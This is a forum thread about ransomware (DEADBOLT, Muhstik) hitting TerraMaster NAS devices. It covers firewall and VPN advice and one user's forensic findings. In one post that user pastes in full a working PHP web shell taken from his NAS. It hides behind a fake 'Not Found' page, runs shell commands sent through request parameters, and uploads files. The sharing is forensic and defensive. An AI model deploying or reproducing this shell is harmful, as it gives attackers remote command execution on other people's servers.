Urgent Notification about TNAS being Attacked by Ransomware

[Roccia7]

I tried to configure the firewall, allowing some incoming ip from my network. But when the filter is active in the system bar is displayed that Internet is not connected. I have allowed all protocols.
What am I doing wrong?
Also can I configure the firewall so that it allows me to use my ddns incoming address? Is it possible to have detailed tutorial with explanation so we understand what we are doing?

[LaMosca]

Roccia7 wrote:
>

https://t.me/ApkStudios

If you want, send me a message or chat from the computer on telegram... use this URL and I'll help you. I speak Spanish. no English. but I will still help you to configure your tnas.

I also think I'm going to create a video tutorial, but if you want send me a message. and I can help you from AnyDesk or from TeamnWiver.

my telegram is https://t.me/ApkStudios

[Strasbdj]

How do I reinstall or upgrade my system if I can't even log into TOS? I've tried following actions on these forums as well as directions provided by TerraMaster but I always end up at the DEADBOLT screen.

System info
TOS v3.12
TNAS F2-220 with 2x 4TB NAS drives

Please help, thank you.

[Charlie_Croker]

Roccia7 wrote:
> I tried to configure the firewall, allowing some incoming ip from my
> network. But when the filter is active in the system bar is displayed that
> Internet is not connected. I have allowed all protocols.
> What am I doing wrong?
> Also can I configure the firewall so that it allows me to use my ddns
> incoming address? Is it possible to have detailed tutorial with explanation
> so we understand what we are doing?

Ok, so does your router support acting as a VPN server?
If so set it up, then from outside your network, you should be able to VPN into it and access your NAS etc.
Now set your firewall rules on the TNAS to only accept local IP access and you should be sorted.
I live and work in Saudi, but my home is in the UK, I have 3 NAS drives in UK (Got my first NAS in 2014) and have never had a successful Ransomware attack.
1st line of defence is a very good router, NEVER rely on the one your Internet Provider supplied, they are the cheapest possible device they could buy and rarely get a firmware update.

[deex]

Some Updates to find more about the attackers, maybe this will help for a investigation of interpol

After i digged deeper in the Hardisk i found some deleted files of the attacker.
The IP Adress that was used to attack my NAS was 191.101.210.172, it leads to a Australian VPN Provider ( ​Servers Australia Pty. Ltd)
https://imgur.com/a/olGzsst

Some more what they did on my NAS

They deleted;
".zloginit.1145" int /etc/tos/scripts"
"m1.php" in www
"IP Adress in /etc/sysconfig/records"

Furthermore they manipulated the "db-tool" file (original Location Unknown)

They Created the files
"index.php" in "usr/www/tos/

I wonder a bit why i wasn't able to find logs in /var/logs also with a deep recovery

[deex]

Furthermore it seems that the first attacks did not happen on 28.02 the first appeared on the 07.01 with the Ransomware "Muhstik Ransomware".
So overall two attacks in one Month

Why Muhstik?
Because i found the Base64 encrypted tag inside the uploaded file .m.php on 07.01
https://imgur.com/a/PTLJx1b

For some reason, the were able to upload a php file and some data gibberish but it seems they failed to encrypt the NAS on that date.

The whole payload was ( i hope that will help to see what they try to do).

[code]
@session_start(); error_reporting(0);$auth_pass = "7417088120f026d02019047766a2fda9"; function printLogin() { echo "<h1>Not Found</h1>"; echo "<p>The requested URL was not found on this server.</p>"; echo "<hr>"; echo "<address>Apache Server at ". $_SERVER['HTTP_HOST'] . " Port 80</address>"; echo "<style>"; echo "input { margin:0;background-color:#fff;border:1px solid #fff; }"; echo "</style>"; echo "<center>"; echo "<form method=post>"; echo "<input type=password name=pass>"; echo "</form></center>"; exit;}if (isset($_GET['wie'])) { $arr = array("who" => array( "os_name" => php_uname('s'), "uname_version_info" => php_uname('v'), "machine_type" => php_uname('m'), "kernel" => php_uname('r'), "php_uname" => php_uname(), "is64bit" => PHP_INT_SIZE === 4 ? false : true )); print(json_encode($arr)); exit;} elseif (isset($_GET['knal'])) { $comd = $_GET['knal']; echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>"; exit;} elseif (isset($_POST['submit'])) { $uploaddir = pwd(); if (!$name = $_POST['newname']) { $name = $_FILES['userfile']['name']; } move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) { echo "Upload Failed"; } else { echo "Upload Success to " . $uploaddir . $name . " :D "; } exit;}if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) { if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; } else { printLogin(); }}echo "<title>UnKnown - muhstik</title><br>";$cur_user = "(" . get_current_user() . ")";echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";function pwd(){ $cwd = getcwd(); if ($u = strrpos($cwd, '/')) { if ($u != strlen($cwd) - 1) { return $cwd . '/'; } else { return $cwd; } ; } elseif ($u = strrpos($cwd, '\\')) { if ($u != strlen($cwd) - 1) { return $cwd . '\\'; } else { return $cwd; } ; } ;}echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';if (isset($_POST['command'])) { $cmd = $_POST['cmd']; echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";} else { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo "<pre><font size=3 color=#000000>" . shell_exec('dir') . "</font></pre>"; } else { echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>"; }}[/code]


These are all files they created but seems that they failed because of the 0 byte files
https://imgur.com/a/QmuQWbc

Futhermore they modified and finally deleted
/etc/crontabs/root
New Content: https://imgur.com/a/W4kDBsm

/etc/crontabs/rc.local
New Content: https://imgur.com/a/KBVGp6W

and in /usr/www/include/class/mobile.class.php they modified and finally deleted it
The code is to long to provide screenshots here.

[deex]

So last post for somedays. i don't know what the original content of the mobile class were

but.. i'm a bit confused about the running of SU and MKDIR 777, that looks not quiet safe right

https://imgur.com/a/HbDMcYU

[deex]

Again some Update, i found only one posting about the payload about were the attacker ran into a honeypot

https://blog.stevenyu.tw/2022/03/02/%E6 ... %E6%83%B9/

So as Steven Yu mentioned, it is a try to implement a Webshell via Post Parameter, and they had success. The sad about is because of the missing logs it is not possible to see for me on which entry they deployed it. I hope you were able to find it and fixed it withint he latest upgrades.

[Roccia7]

LaMosca wrote:
> Roccia7 wrote:
> >
>
> https://t.me/ApkStudios

Thank you so much for the proposal and the help you offer me, but I don't think about making the changes now because I am waiting for the release of TOS 5. But I also look forward to your tutorial, I think it could be useful to others too

Charlie_Croker wrote
> Roccia7 wrote:
> >
>
Yes I have a fritz box 7590 that already has its vpn. I also tried to configure the firewall of the nas as you said but after nas not connect to the internet anymore

[Charlie_Croker]

Roccia7 wrote:
> LaMosca wrote:
> > Roccia7 wrote:
> > >
> >
> > https://t.me/ApkStudios
>
> Thank you so much for the proposal and the help you offer me, but I don't think about
> making the changes now because I am waiting for the release of TOS 5. But I also look
> forward to your tutorial, I think it could be useful to others too
>
> Charlie_Croker wrote
> > Roccia7 wrote:
> > >
> >
> Yes I have a fritz box 7590 that already has its vpn. I also tried to configure the
> firewall of the nas as you said but after nas not connect to the internet anymore

Why do you need your NAS to connect to the Internet? You will be able to access your home network (including the NAS) via the VPN.